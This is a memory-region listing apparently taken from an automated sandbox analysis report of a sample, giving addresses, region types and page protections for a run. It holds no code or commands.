|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
401000
|
unkown
|
page execute read
|
||
789E000
|
stack
|
page read and write
|
||
20EE7000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
45D000
|
system
|
page execute and read and write
|
||
AEC000
|
stack
|
page read and write
|
||
B97000
|
heap
|
page read and write
|
||
6061000
|
trusted library allocation
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
23384EDB000
|
heap
|
page read and write
|
||
23384CE9000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
60CB000
|
trusted library allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
AD5000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
23384E00000
|
heap
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
A49000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
1796000
|
remote allocation
|
page execute and read and write
|
||
23384DF0000
|
trusted library allocation
|
page read and write
|
||
4410000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
A49000
|
heap
|
page read and write
|
||
691CB7E000
|
unkown
|
page readonly
|
||
9C000
|
stack
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
23384E50000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A53000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
D16000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
20E90000
|
heap
|
page read and write
|
||
20E98000
|
heap
|
page read and write
|
||
308D000
|
trusted library allocation
|
page execute and read and write
|
||
A4C000
|
heap
|
page read and write
|
||
44D2000
|
heap
|
page read and write
|
||
8420000
|
trusted library allocation
|
page read and write
|
||
23380102000
|
heap
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
B9A000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
20F18000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
44DF000
|
heap
|
page read and write
|
||
23384F0F000
|
heap
|
page read and write
|
||
2C3D000
|
stack
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
2C60000
|
trusted library allocation
|
page read and write
|
||
20DDC000
|
unclassified section
|
page execute and read and write
|
||
44D6000
|
heap
|
page read and write
|
||
20E6C000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
2338015A000
|
heap
|
page read and write
|
||
7629000
|
heap
|
page read and write
|
||
4B6E000
|
stack
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
A4C000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
A9A000
|
heap
|
page read and write
|
||
4300000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
23384EEB000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
84E0000
|
heap
|
page read and write
|
||
20E6F000
|
heap
|
page read and write
|
||
44C3000
|
heap
|
page read and write
|
||
209B0000
|
unclassified section
|
page execute and read and write
|
||
2337F88F000
|
heap
|
page read and write
|
||
AD7000
|
heap
|
page read and write
|
||
5061000
|
trusted library allocation
|
page read and write
|
||
A1F000
|
stack
|
page read and write
|
||
4D10000
|
heap
|
page read and write
|
||
A58000
|
heap
|
page read and write
|
||
20F40000
|
heap
|
page read and write
|
||
20E6F000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
89FC000
|
stack
|
page read and write
|
||
4485000
|
heap
|
page read and write
|
||
4737000
|
heap
|
page read and write
|
||
233808C0000
|
trusted library section
|
page readonly
|
||
8A40000
|
trusted library allocation
|
page read and write
|
||
4485000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
91F000
|
stack
|
page read and write
|
||
79C0000
|
trusted library allocation
|
page read and write
|
||
20E10000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
1FFB0000
|
remote allocation
|
page read and write
|
||
7662000
|
heap
|
page read and write
|
||
AD7000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
23380C50000
|
trusted library allocation
|
page read and write
|
||
5FC000
|
heap
|
page read and write
|
||
6BF000
|
stack
|
page read and write
|
||
A63000
|
heap
|
page read and write
|
||
20E31000
|
heap
|
page read and write
|
||
207FD000
|
stack
|
page read and write
|
||
2C60000
|
trusted library allocation
|
page read and write
|
||
23380002000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
61F6000
|
trusted library allocation
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
2ED000
|
stack
|
page read and write
|
||
20D2B000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
70D0000
|
direct allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
20E6C000
|
heap
|
page read and write
|
||
20D2B000
|
heap
|
page read and write
|
||
23384EF4000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
70F0000
|
direct allocation
|
page read and write
|
||
A76000
|
heap
|
page read and write
|
||
44C3000
|
heap
|
page read and write
|
||
2337F891000
|
heap
|
page read and write
|
||
76A8000
|
heap
|
page read and write
|
||
A57000
|
heap
|
page read and write
|
||
24F1000
|
heap
|
page read and write
|
||
A49000
|
heap
|
page read and write
|
||
B29000
|
stack
|
page read and write
|
||
2010000
|
heap
|
page read and write
|
||
23386000000
|
heap
|
page read and write
|
||
908000
|
heap
|
page read and write
|
||
737000
|
heap
|
page read and write
|
||
2400000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
A6C000
|
heap
|
page read and write
|
||
20EE7000
|
heap
|
page read and write
|
||
23384DE0000
|
trusted library allocation
|
page read and write
|
||
6E0000
|
heap
|
page read and write
|
||
23384F13000
|
heap
|
page read and write
|
||
8680000
|
heap
|
page read and write
|
||
68E000
|
stack
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
4504000
|
heap
|
page read and write
|
||
30FB000
|
heap
|
page read and write
|
||
4487000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
23384E0F000
|
heap
|
page read and write
|
||
4CEE000
|
stack
|
page read and write
|
||
A63000
|
heap
|
page read and write
|
||
8535000
|
trusted library allocation
|
page read and write
|
||
A5D000
|
heap
|
page read and write
|
||
30B5000
|
trusted library allocation
|
page execute and read and write
|
||
691CE7E000
|
unkown
|
page readonly
|
||
644000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
450D000
|
heap
|
page read and write
|
||
30F0000
|
heap
|
page read and write
|
||
A57000
|
heap
|
page read and write
|
||
70491000
|
unkown
|
page execute read
|
||
A4F000
|
heap
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
44F7000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
233808E0000
|
trusted library section
|
page readonly
|
||
450D000
|
heap
|
page read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
7140000
|
direct allocation
|
page read and write
|
||
2017C000
|
stack
|
page read and write
|
||
20EAC000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
73C000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
20F18000
|
heap
|
page read and write
|
||
4620000
|
direct allocation
|
page read and write
|
||
8776000
|
heap
|
page read and write
|
||
23384C70000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
1FD0E000
|
stack
|
page read and write
|
||
1FA6D000
|
stack
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
9CB6000
|
direct allocation
|
page execute and read and write
|
||
691C37E000
|
unkown
|
page readonly
|
||
7A10000
|
trusted library allocation
|
page read and write
|
||
711000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
A9C000
|
heap
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
2337F7B0000
|
heap
|
page read and write
|
||
2414000
|
heap
|
page read and write
|
||
A74000
|
heap
|
page read and write
|
||
30A0000
|
trusted library allocation
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
20A0D000
|
unclassified section
|
page execute and read and write
|
||
2E90000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
23384E1F000
|
heap
|
page read and write
|
||
2337F6B0000
|
heap
|
page read and write
|
||
84D000
|
heap
|
page read and write
|
||
20D2B000
|
heap
|
page read and write
|
||
691D17E000
|
unkown
|
page readonly
|
||
795D000
|
stack
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
A5A000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
2DF0000
|
trusted library section
|
page read and write
|
||
A65000
|
heap
|
page read and write
|
||
212E000
|
stack
|
page read and write
|
||
7664000
|
heap
|
page read and write
|
||
8570000
|
trusted library allocation
|
page read and write
|
||
4610000
|
direct allocation
|
page read and write
|
||
A74000
|
heap
|
page read and write
|
||
745000
|
heap
|
page read and write
|
||
2B5F000
|
stack
|
page read and write
|
||
4210000
|
heap
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
4BA5000
|
heap
|
page execute and read and write
|
||
691C67B000
|
stack
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
2337F8B0000
|
heap
|
page read and write
|
||
20F70000
|
heap
|
page read and write
|
||
20CEC000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
7970000
|
trusted library allocation
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
20E37000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
B9B000
|
heap
|
page read and write
|
||
8410000
|
trusted library allocation
|
page execute and read and write
|
||
2337F800000
|
heap
|
page read and write
|
||
23384C90000
|
trusted library allocation
|
page read and write
|
||
20A09000
|
unclassified section
|
page execute and read and write
|
||
A61000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
2337F87D000
|
heap
|
page read and write
|
||
620A000
|
trusted library allocation
|
page read and write
|
||
20BF9000
|
heap
|
page read and write
|
||
91E0000
|
direct allocation
|
page execute and read and write
|
||
4730000
|
heap
|
page read and write
|
||
50C2000
|
trusted library allocation
|
page read and write
|
||
57E000
|
stack
|
page read and write
|
||
A76000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
691CDFE000
|
stack
|
page read and write
|
||
691C47C000
|
stack
|
page read and write
|
||
2C60000
|
trusted library allocation
|
page read and write
|
||
233808B0000
|
trusted library section
|
page readonly
|
||
B80000
|
heap
|
page read and write
|
||
20D2C000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
74B0000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
2338011A000
|
heap
|
page read and write
|
||
3084000
|
trusted library allocation
|
page read and write
|
||
6CE000
|
stack
|
page read and write
|
||
2337F87B000
|
heap
|
page read and write
|
||
44FF000
|
heap
|
page read and write
|
||
23384CD0000
|
trusted library allocation
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
85A0000
|
trusted library allocation
|
page read and write
|
||
23384F17000
|
heap
|
page read and write
|
||
20EE7000
|
heap
|
page read and write
|
||
4507000
|
heap
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
233806B0000
|
trusted library allocation
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
73E000
|
heap
|
page read and write
|
||
3070000
|
trusted library allocation
|
page read and write
|
||
A6E000
|
heap
|
page read and write
|
||
8580000
|
trusted library allocation
|
page read and write
|
||
20E76000
|
heap
|
page read and write
|
||
448A000
|
heap
|
page read and write
|
||
20D20000
|
heap
|
page read and write
|
||
849E000
|
stack
|
page read and write
|
||
23384EC1000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
85D0000
|
heap
|
page read and write
|
||
20A23000
|
unclassified section
|
page execute and read and write
|
||
A40000
|
heap
|
page read and write
|
||
20B81000
|
heap
|
page read and write
|
||
A4F000
|
heap
|
page read and write
|
||
A92000
|
heap
|
page read and write
|
||
2067F000
|
stack
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
201BE000
|
stack
|
page read and write
|
||
A52000
|
heap
|
page read and write
|
||
2043C000
|
stack
|
page read and write
|
||
691D47E000
|
unkown
|
page readonly
|
||
A61000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
4487000
|
heap
|
page read and write
|
||
70B0000
|
direct allocation
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
843000
|
heap
|
page read and write
|
||
74A0000
|
heap
|
page read and write
|
||
2196000
|
remote allocation
|
page execute and read and write
|
||
20BF9000
|
heap
|
page read and write
|
||
44CB000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
23380000000
|
heap
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
303E000
|
stack
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
4630000
|
direct allocation
|
page read and write
|
||
85C0000
|
trusted library allocation
|
page execute and read and write
|
||
8728000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
23380113000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
CBE000
|
stack
|
page read and write
|
||
691CD7E000
|
unkown
|
page readonly
|
||
4BA0000
|
heap
|
page execute and read and write
|
||
75D0000
|
heap
|
page read and write
|
||
A49000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
44E8000
|
heap
|
page read and write
|
||
23384E55000
|
heap
|
page read and write
|
||
2C5F000
|
stack
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
20E6F000
|
heap
|
page read and write
|
||
7850000
|
trusted library allocation
|
page read and write
|
||
20E30000
|
heap
|
page read and write
|
||
20F41000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
20BF8000
|
heap
|
page read and write
|
||
4BEE000
|
stack
|
page read and write
|
||
44FA000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
211F000
|
stack
|
page read and write
|
||
2135B000
|
unclassified section
|
page execute and read and write
|
||
3260000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
44F0000
|
heap
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
7130000
|
direct allocation
|
page read and write
|
||
A57000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
2337F913000
|
heap
|
page read and write
|
||
4400000
|
direct allocation
|
page read and write
|
||
44F7000
|
heap
|
page read and write
|
||
4487000
|
heap
|
page read and write
|
||
B99000
|
heap
|
page read and write
|
||
208FF000
|
stack
|
page read and write
|
||
430000
|
unkown
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
AD7000
|
heap
|
page read and write
|
||
21A0000
|
heap
|
page read and write
|
||
228E000
|
stack
|
page read and write
|
||
20E6A000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
2337F8FF000
|
heap
|
page read and write
|
||
20EE8000
|
heap
|
page read and write
|
||
704AF000
|
unkown
|
page readonly
|
||
A41000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
23384DC0000
|
trusted library allocation
|
page read and write
|
||
4640000
|
direct allocation
|
page read and write
|
||
23384F00000
|
heap
|
page read and write
|
||
A99000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
41E0000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
8A00000
|
trusted library allocation
|
page read and write
|
||
7692000
|
heap
|
page read and write
|
||
20E6A000
|
heap
|
page read and write
|
||
2337F7E0000
|
trusted library allocation
|
page read and write
|
||
20D80000
|
unclassified section
|
page execute and read and write
|
||
44C3000
|
heap
|
page read and write
|
||
4680000
|
direct allocation
|
page read and write
|
||
3240000
|
heap
|
page execute and read and write
|
||
18F000
|
stack
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
2337F813000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
4504000
|
heap
|
page read and write
|
||
A4A000
|
heap
|
page read and write
|
||
8731000
|
heap
|
page read and write
|
||
6BF000
|
stack
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
2337F902000
|
heap
|
page read and write
|
||
289F000
|
stack
|
page read and write
|
||
3220000
|
trusted library allocation
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
2C60000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
618000
|
heap
|
page read and write
|
||
21370000
|
direct allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
A45000
|
heap
|
page read and write
|
||
6E8000
|
heap
|
page read and write
|
||
23384CB0000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
7656000
|
heap
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
20CEC000
|
heap
|
page read and write
|
||
19E000
|
stack
|
page read and write
|
||
313C000
|
heap
|
page read and write
|
||
691CBFE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
23385030000
|
remote allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
There are 912 hidden memdumps, click here to show them.